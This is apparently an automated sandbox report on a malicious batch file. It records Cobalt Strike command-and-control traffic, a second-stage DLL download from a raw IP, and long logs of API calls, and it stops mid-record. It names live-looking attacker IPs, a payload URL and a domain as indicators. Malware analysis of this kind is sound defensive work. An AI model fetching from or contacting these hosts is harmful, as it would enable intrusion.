popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

updateadmin2.bat

Generic Malware UPX Malicious Library Malicious Packer Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges DNS Code injection Sniff Audio Steal credential AntiDebug PE64 AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 1, 2021, 10:56 a.m. Nov. 1, 2021, 11:12 a.m.
Size 450.0B
Type DOS batch file, ASCII text
MD5 8a8a26331aea7126ede07c9988343045
SHA256 0012ab676b84e8762edba4994f0887b0a04d47ce81e286fabb978af3491a8874
CRC32 C54D31DF
ssdeep 6:enyszV7kiKGBHLYeptILx4nyLmZ5LP0zmKtCIXUlWanyLmZ5LP0zmKtCIXUIvRpW:enN7ntBzn7LPwPYjlWan7LPwPYjd
Yara
  • Antivirus - Contains references to security software

Name Response Post-Analysis Lookup
nutsstats.com
IP Address Status Action
108.62.12.61 Active Moloch
164.124.101.2 Active Moloch
194.5.212.190 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49171 -> 194.5.212.190:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 194.5.212.190:80 -> 192.168.56.103:49171 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.5.212.190:80 -> 192.168.56.103:49171 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49184 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49192 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49192 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49186 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49186 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49204 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49204 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49202 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49202 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49207 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49190 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49207 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49190 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49209 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49191 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49209 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49191 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49195 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49210 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49195 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49210 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49197 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49197 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49199 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49199 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49193 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49193 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49189 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49200 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49189 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49200 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49201 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49201 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49194 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49194 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49205 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49205 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49196 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49196 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49206 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49206 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49198 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49198 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49203 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49203 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49211 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49211 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49208 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49208 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 108.62.12.61:99 -> 192.168.56.103:49196 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49195 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49194 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49190 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49200 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49202 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49207 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49186 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49192 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49189 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49184 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49208 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49211 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49206 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49203 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49193 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49198 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49201 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49205 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49204 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49191 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49197 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49199 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49209 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49210 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d1e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d760
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d760
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d760
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d2e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d2e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d2e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d2e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d2e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d2e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d760
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d760
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d760
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051d660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051db60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0051db60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f038
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f178
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f178
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f178
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029e8f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029e8f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029e8f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029e8f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029e8f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029e8f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://194.5.212.190/load/trendmicro2.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://108.62.12.61/home2
request GET http://194.5.212.190/load/trendmicro2.dll
request GET http://108.62.12.61/home2
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02780000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c51000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01efa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c52000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ef2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02781000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02782000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f43000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0240b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02407000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01efb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02405000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f45000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02810000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f46000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0240c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
